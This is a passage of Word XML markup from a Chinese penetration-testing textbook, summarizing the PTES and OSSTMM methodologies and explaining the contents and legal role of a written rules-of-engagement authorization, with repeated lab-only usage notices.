        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞分析对标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：是否建立了持续的漏洞管理与定级流程？扫描频率是否匹配业务变更节奏？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">利用与后渗透对标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：纵深防御体系是否假设“边界已被突破”而设计了内网检测与控制？是否有能力检测横向移动与异常凭据使用（见卷五）？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">报告对标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：每次渗透测试后的修复跟踪是否闭环？安全团队能否将渗透报告的发现转化为可度量的安全基线改善？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御方若能在渗透测试进行前就参照此清单完成自查，将极大提升测试的效率和价值——测试者不必浪费时间去发现那些甲方自己早已知道但未修复的低悬果实，而可以集中精力追踪更隐蔽、更复杂的攻击路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结与声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的七阶段（前期交互→情报收集→威胁建模→漏洞分析→利用→后渗透→报告）构成了一次授权渗透测试的完整生命周期，每一阶段均有明确的输入、输出与质量要求。OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以度量为核心补充了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在可重复性、可量化性方面的不足，使渗透测试从主观判断走向客观评估。这两个框架与第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章引入的网络杀伤链和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">形成三级映射关系。但所有方法论本质上都是“脚手架”——在真实项目中，RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的法律约束是第一优先级，方法论必须服从于授权范围的裁剪。全书后续各章将在这一生命周期框架下展开具体技术：卷二对应情报收集，卷三与卷四对应漏洞分析、利用与后渗透，卷五从防御视角回扣威胁建模与报告。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节内容为方法论框架介绍，不含实操命令。但本节所描述的所有渗透测试活动（情报收集、漏洞扫描、利用、后渗透），在未经书面授权的情况下对任何非自有/非授权目标执行均属违法行为。本书后续所有含实操命令的节，均要求读者在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章搭建的隔离实验室（host-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络，与生产及公网物理或逻辑隔离）中或已在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox/TryHackMe/VulnHub/OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等官方授权平台上执行。严禁将本书任何技术应用于未授权系统。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="63" w:name="授权范围roe报告写作与命令复习习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权范围（RoE）、报告写作与命令复习·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节涉及的所有命令、工具与模板示例，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅限读者在自建隔离实验环境或已获得书面授权的靶机（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HackTheBox、TryHackMe、VulnHub、OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方镜像、企业内部授权测试平台）上执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。实验网络必须与生产环境及互联网进行物理或逻辑隔离（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> host-only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或独立</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未经授权访问、扫描、渗透他人系统属于违法犯罪行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。本节内容的唯一合法用途是帮助读者理解授权渗透测试的法律实务与报告规范，并在安全环境中复习</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux/网络命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节为方法论收束节，要求读者已理解第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES/OSSTMM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段划分、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的杀伤链与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架，并已完成第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的靶场搭建。涉及的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础与网络协议栈（IP/子网/路由/NAT、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机、ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）已在《从位到物联》Ch24–28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">详细讲授，本节仅做安全语境下的复习，不重讲原理。密码学数学基础回指《从位到物联》CM5，不重推。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试的执行标准（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PTES）为技术活动提供了流程骨架，但若缺乏法律边界与书面产出，该骨架便不具备合法性与商业价值。上一节已将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的七阶段模型与杀伤链、ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">建立起三级映射关系，并强调了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在整个生命周期中的绝对优先地位。本节正是对这一原则的实务展开——将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的“前期交互”与“报告”两个阶段转化为具体的操作指南：如何签署一份受法律保护的授权范围（Rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of Engagement, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RoE）文件，以及如何撰写一份可交付、可审计的渗透测试报告。在此基础上，本节将回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与网络命令在安全语境下的高频用法，但绝不重复《从位到物联》中已讲授的基础知识。本节以习题收束，要求读者为自建靶场撰写一页</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RoE，将方法论转化为可操作的合规能力。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="64" w:name="授权范围roe法律护身符"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权范围（RoE）：法律护身符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试本质上是一项“被授权的攻击”。攻击者（红队）与渗透测试者虽然在技术上使用相同工具，二者的本质区别在于是否存在合法授权。这一区别由一份书面的《授权范围》（Rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of Engagement, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RoE）所界定。RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不仅是法律文件，也是确定渗透测试边界、保护测试者免于刑事与民事责任的操作底图——这正是第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节所强调的“前期交互是渗透测试真正的起点”的实务落地。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：未经授权的攻击者不受任何规则约束，但面临法律制裁风险。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：组织的安全团队需要依据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区分“授权测试活动”与“真实入侵事件”，以便在日志与告警中做出正确响应。若测试者超出授权范围，防御方有权将其行为视为敌意入侵并采取反制措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至少应包括以下核心要素，这些要素在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“前期交互阶段”中定义，并在国际上被广泛采纳为行业惯例（OSSTMM、NIST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SP 800-115 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等标准均有类似要求）①：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：明确授权测试的系统、网络、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段、域名、应用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及物理场所（若涉及社会工程学或物理渗透）。范围描述必须足够精确，避免歧义。例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.10.0/24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网段内所有存活主机执行全端口扫描”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">比“扫描公司内网”更受法律保护。所有不在此范围内的资产均为禁止触碰的禁区。对于第三方资产（如托管在云服务商的基础设施），必须确认合同中是否包含渗透测试授权条款——许多公有云服务商要求提前提交测试申请与时间窗，方可合法测试②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">时间窗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：规定测试执行的具体起止时间（含时区）。时间窗之外的所有活动均视为未授权。这有助于防御团队做日志关联：凡在时间窗内、来自测试者源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的告警可标记为“授权活动”，时间窗外出现的相同行为则应立即升级为安全事件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁止动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：明确列出测试期间不可执行的行为。常见禁止项包括：拒绝服务（DoS）攻击、物理破坏、社会工程学中对特定高管以外员工的钓鱼、对生产数据的修改或删除、使用已知会导致系统崩溃的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit、在共享基础设施上进行资源密集型扫描等。这一清单保护了目标系统的可用性，避免渗透测试本身变成“事故”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应急联系信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：提供测试团队与目标组织的关键联系人名单（含手机号、备用通信方式），以便在测试引发意外系统中断、发现正进行中的真实入侵、或法律执行机构介入时，双方可即时沟通。通常要求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7×24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小时可用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据处理与销毁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：规定测试过程中收集的数据（扫描结果、截图、抓包、导出的数据库样本、口令哈希等）如何存储（加密要求）、传输（安全通道）、保留期限以及测试结束后如何安全销毁。涉及个人隐私数据（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GDPR、PIPL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等法规管辖范围内的信息）时，必须单独声明处理方式并获取法律团队确认。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">测试源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与工具清单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：提供测试者将使用的源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址（或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段）、测试工具的类别（如端口扫描器、漏洞扫描器、Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理等）。这允许防御团队在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM（Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Information and Event </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Management，安全信息和事件管理）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF（Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall，Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙）中将源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加入白名单，避免测试流量被自动阻断，同时仍可审计测试者是否使用了未声明的工具或从非授权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起攻击②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">书面授权的法律意义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：一份书面的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由委托方（被测试组织）的授权代表（通常为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CISO、CTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或法务负责人）与测试方（渗透测试人员或其公司）共同签署。在普通法体系中，该文件构成“同意”（consent）的法律证据，可在侵入计算机系统指控中作为积极抗辩。在大陆法体系中，它是对“授权行为”的民事与刑事豁免依据。口头授权不具备同等法律效力——无书面记录时，任何一方均可否认对敏感资产的测试授权，导致测试者面临法律风险。因此，业界铁律为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“无书面授权，不执行测试。”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这与第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
